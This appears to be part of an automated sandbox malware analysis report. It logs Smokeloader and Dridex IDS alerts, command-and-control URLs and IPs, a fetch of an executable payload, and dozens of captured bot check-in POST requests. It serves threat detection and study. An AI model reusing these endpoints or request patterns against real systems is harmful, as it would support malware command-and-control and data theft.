                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49711 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49706 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49708 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49714 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49707 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49712 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49713 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49709 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49710 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49721 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49719 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49716 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49734 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49731 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49717 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49715 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49735 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49722 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49728 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49730 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49720 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49733 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49718 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49729 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49723 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49724 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49737 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49751 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49753 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49754 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49732 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49756 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49760 -> 109.121.204.14:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49755 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49752 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49758 -> 109.121.204.14:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49725 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49736 -> 187.228.112.175:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49762 -> 109.121.204.14:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49738 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49738 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49739 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49740 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49741 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49749 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49763 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49739 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49740 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49747 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49763 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49744 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49749 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49746 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49741 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49759 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49747 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49759 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49757 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49757 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49748 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49748 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49743 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49744 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49750 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49745 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49743 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49750 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49746 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49742 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49742 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49745 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49761 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49761 -> 23.145.40.162:443
                  Source: C:\Windows\explorer.exeNetwork Connect: 109.121.204.14 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 187.228.112.175 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 23.145.40.162 443Jump to behavior
                  Source: Malware configuration extractorURLs: http://nwgrus.ru/tmp/index.php
                  Source: Malware configuration extractorURLs: http://tech-servers.in.net/tmp/index.php
                  Source: Malware configuration extractorURLs: http://unicea.ws/tmp/index.php
                  Source: Joe Sandbox ViewIP Address: 23.145.40.164 23.145.40.164
                  Source: Joe Sandbox ViewIP Address: 23.145.40.162 23.145.40.162
                  Source: Joe Sandbox ViewASN Name: INTERNETGROUP-AS-BGBulgariaBG INTERNETGROUP-AS-BGBulgariaBG
                  Source: Joe Sandbox ViewASN Name: UninetSAdeCVMX UninetSAdeCVMX
                  Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
                  Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
                  Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 23.145.40.162:443 -> 192.168.2.8:49738
                  Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://mcjvrcrjrartnd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://niarejwvgfav.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://lkfxgtbclffake.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://fyhvuoiqukrfjpjs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://jmcgnnydyiyvfde.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://vjdyvxrsjwk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://phwhrimonssxx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://hqblemeoblb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ffcibdqlkyf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ywfvqxxvpvjvadf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://dbbwmiqkkpy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://gklmvitduapshup.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://calvinandhalls.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 501Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://jefnxxqxuxib.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://npjscmvmupb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ipmfrunnoji.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://wwkvkysjcmxmifd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dhwuphumqtqn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tkpgpviexggpuwvs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jrbmtindhjismyee.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ynepfbdxkuieepaf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xkxmfugtrnxonclj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ymeegmcrvikfsv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qnssdnlxskerq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vpprwqijyswgyjvy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ayjhmseqvvjye.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bnqsjigsukajkt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ejrqbeuhiivimsok.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yanbtiwxewyyhy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://frpabbqmujgvx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ybeufjfqrbhah.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://astksdjaitsnxo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ssdmhljrxull.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mshenhcpddejse.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pjefvbuybfqlgx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fufaecmkeyed.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://naauncqsbvtxnxe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lcpcrwvedbvpllck.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lgertcnwaskqpc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fevqsrdkflt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://drnpfojnpvggv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ibetbbesaakqkq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tyqfkmhoepxpii.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wyjfuitjcdhsl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecpjrwjcauix.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: nwgrus.ru
